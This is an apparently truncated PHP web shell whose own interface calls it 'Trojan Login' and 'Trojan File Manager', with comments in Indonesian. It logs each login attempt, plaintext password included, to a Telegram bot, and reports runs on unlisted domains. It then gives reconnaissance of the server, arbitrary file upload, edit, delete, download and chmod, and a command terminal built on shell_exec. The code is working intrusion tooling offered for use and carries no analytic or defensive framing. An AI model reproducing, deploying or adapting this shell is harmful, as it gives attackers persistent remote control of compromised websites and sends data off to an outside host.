$chatId,
"text" => $msg,
"parse_mode" => "HTML"
];
$options = [
"http" => [
"header" => "Content-Type: application/x-www-form-urlencoded\r\n",
"method" => "POST",
"content" => http_build_query($data)
]
];
$context = stream_context_create($options);
@file_get_contents($url, false, $context);
}
// === ANTI-COPY LOGGER ===
$currentDomain = $_SERVER['HTTP_HOST'] ?? 'Unknown';
$ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
if (!in_array($currentDomain, $allowedDomains)) {
$uniqueKey = $currentDomain . '|' . $ip;
$hashKey = md5($uniqueKey);
$logFile = __DIR__ . "/.anti_copy_log"; // cache file
// buat file kosong jika belum ada
if (!file_exists($logFile)) {
file_put_contents($logFile, "");
}
// baca isi log jadi array
$logged = @file($logFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (!is_array($logged)) {
$logged = [];
}
// cek apakah kombinasi domain+IP sudah ada
if (!in_array($hashKey, $logged)) {
$uri = $_SERVER['REQUEST_URI'] ?? '';
$full = "http://" . $currentDomain . $uri;
$ua = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$time = date("Y-m-d H:i:s");
$msg = "⚠️ Script Dicuri / Dijalankan di Domain Asing\n"
. "🌐 Domain: $full\n"
. "👤 IP: $ip\n"
. "📱 User Agent: $ua\n"
. "⏰ Time: $time";
sendTelegram($botToken, $chatId, $msg);
// simpan hash ke log file
file_put_contents($logFile, $hashKey . PHP_EOL, FILE_APPEND | LOCK_EX);
}
}
if (!isset($_SESSION['logged_in'])) {
if (isset($_POST['password'])) {
$domain = $_SERVER['HTTP_HOST'] ?? 'Unknown';
$uri = $_SERVER['REQUEST_URI'] ?? '';
$fullUrl = "http://" . $domain . $uri;
$ua = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
$time = date("Y-m-d H:i:s");
$passTry = $_POST['password'];
if (password_verify($_POST['password'], $hashPassword)) {
$_SESSION['logged_in'] = true;
$msg = "✅ Login Berhasil\n"
. "🌐 Domain: $fullUrl\n"
. "👤 IP: $ip\n"
. "📱 User Agent: $ua\n"
. "🔑 Password Input: $passTry\n"
. "⏰ Time: $time";
sendTelegram($botToken, $chatId, $msg);
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
$error = "Password salah!";
$msg = "❌ Login Gagal\n"
. "🌐 Domain: $fullUrl\n"
. "👤 IP: $ip\n"
. "📱 User Agent: $ua\n"
. "🔑 Password Input: $passTry\n"
. "⏰ Time: $time";
sendTelegram($botToken, $chatId, $msg);
}
}
?>
Trojan Login
💀 Trojan Access 💀
$error"; ?>
All Functions Accessible"
: "$disable_functions";
// Cek ekstensi
$curl = extension_loaded("curl") ? "ON" : "OFF";
$ssh2 = extension_loaded("ssh2") ? "ON" : "OFF";
$mysql = (extension_loaded("mysqli") || extension_loaded("mysqlnd"))
? "ON"
: "OFF";
echo "";
echo "🖥️ Uname: $uname
";
echo "👤 User: $user
";
echo "🐘 PHP: $phpv | SAPI: $sapi
";
echo "🌐 Server IP: $server_ip | Your IP: $client_ip
";
echo "⏰ DateTime: $datetime
";
echo "💾 HDD: Total: {$hdd_total} GB | Free: {$hdd_free} GB
";
echo "🕵️ User Agent: $ua
";
echo "⚙️ Disable Functions: $disable_functions
";
echo "🔌 CURL: $curl | SSH2: $ssh2 | MySQL: $mysql
";
echo "📦 Software: $soft
";
echo "
";
}
// Variabel utama
$currentDir = isset($_GET['dir']) ? $_GET['dir'] : __DIR__;
// Upload file
if (isset($_FILES['upload'])) {
$target = $currentDir . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
move_uploaded_file($_FILES['upload']['tmp_name'], $target);
header("Location: ?dir=$currentDir"); exit;
}
// Create folder
if (!empty($_POST['newfolder'])) {
mkdir($currentDir . DIRECTORY_SEPARATOR . $_POST['newfolder']);
header("Location: ?dir=$currentDir"); exit;
}
// Create file
if (!empty($_POST['newfile'])) {
file_put_contents($currentDir . DIRECTORY_SEPARATOR . $_POST['newfile'], "// new file");
header("Location: ?dir=$currentDir"); exit;
}
// Delete file/folder
if (isset($_GET['delete'])) {
$target = $_GET['delete'];
if (is_dir($target)) {
rmdir($target);
} else {
unlink($target);
}
header("Location: ?dir=$currentDir"); exit;
}
// Download file
if (isset($_GET['download'])) {
$file = $_GET['download'];
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
readfile($file); exit;
}
// Rename
if (isset($_POST['rename_from'], $_POST['rename_to'])) {
rename($_POST['rename_from'], $currentDir . DIRECTORY_SEPARATOR . $_POST['rename_to']);
header("Location: ?dir=$currentDir"); exit;
}
// Chmod
if (isset($_POST['chmod_file'], $_POST['chmod_perm'])) {
chmod($_POST['chmod_file'], octdec($_POST['chmod_perm']));
header("Location: ?dir=$currentDir"); exit;
}
// Edit file
if (isset($_POST['edit_file'], $_POST['file_content'])) {
file_put_contents($_POST['edit_file'], $_POST['file_content']);
header("Location: ?dir=$currentDir"); exit;
}
// Variabel utama (pakai realpath biar aman)
$currentDir = isset($_GET['dir']) ? realpath($_GET['dir']) : __DIR__;
if ($currentDir === false) $currentDir = __DIR__;
// Breadcrumb
function breadcrumb($path) {
$parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR));
$crumb = "";
$links = [];
foreach ($parts as $part) {
$crumb .= DIRECTORY_SEPARATOR . $part;
$links[] = "$part";
}
// tombol Home ke __DIR__
$homeDir = __DIR__;
$homeBtn = "[🏠 Home]";
echo "
PATH: " . implode(" ▸ ", $links) . " $homeBtn
";
}
// List files/folders
function listFiles($dir) {
$files = scandir($dir);
$folders = [];
$regularFiles = [];
foreach ($files as $file) {
if ($file=="." ) continue;
if ($file=="..") {
echo "| ⬅️ Up | | | |
";
continue;
}
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) $folders[$file] = $path;
else $regularFiles[$file] = $path;
}
// Folders dulu
foreach ($folders as $file => $path) {
$perm = substr(sprintf('%o', fileperms($path)), -4);
echo "
| 📂 $file |
-- |
$perm |
[❌]
|
";
}
// Lalu file
foreach ($regularFiles as $file => $path) {
$perm = substr(sprintf('%o', fileperms($path)), -4);
echo "
| 📄 $file |
" . filesize($path) . " B |
$perm |
[⬇️]
[❌]
[✏️]
|
";
}
}
?>
Trojan Manager
💻 Trojan File Manager 💻
✏️ Editing: $editFile";
echo "
";
}
echo "
";
echo "| Name | Size | Perm | Actions |
";
listFiles($currentDir);
echo "
";
?>
&1");
// cek kalau ada wget atau curl -O
if (preg_match('/\bwget\s+(\S+)/', $command, $m) || preg_match('/\bcurl\s+-O\s+(\S+)/', $command, $m)) {
$url = basename($m[1]);
if (file_exists($currentDir . DIRECTORY_SEPARATOR . $url)) {
$downloadLink = "
📥 Download hasil: $url";
}
}
}
?>
'dir',
'clear' => 'cls',
'cat' => 'type',
'pwd' => 'cd',
'rm' => 'del',
'mv' => 'move',
'cp' => 'copy'
];
foreach ($map as $linux => $win) {
if (preg_match("/^$linux(\s|$)/", $cmd)) {
$cmd = preg_replace("/^$linux/", $win, $cmd);
break;
}
}
return $cmd;
}
if (isset($_POST['cmd'])) {
$command = $_POST['cmd'];
$originalCmd = $command; // simpan asli
$command = translateCommand($command, $isWindows);
$termOutput = shell_exec($command . " 2>&1");
// 🔥 Deteksi wget / curl
if (!$isWindows) {
if (preg_match('/\bwget\s+(?:-O\s+(\S+))?\s*(\S+)/', $originalCmd, $m)) {
// wget -O filename url
$fileName = !empty($m[1]) ? $m[1] : basename($m[2]);
} elseif (preg_match('/\bcurl\s+(?:-o|-O)\s+(\S+)/', $originalCmd, $m)) {
// curl -O url / curl -o filename url
$fileName = basename($m[1]);
}
if (!empty($fileName)) {
$filePath = $currentDir . DIRECTORY_SEPARATOR . $fileName;
if (file_exists($filePath)) {
$downloadLink = "
📂 Buka File: $fileName";
}
}
}
}
?>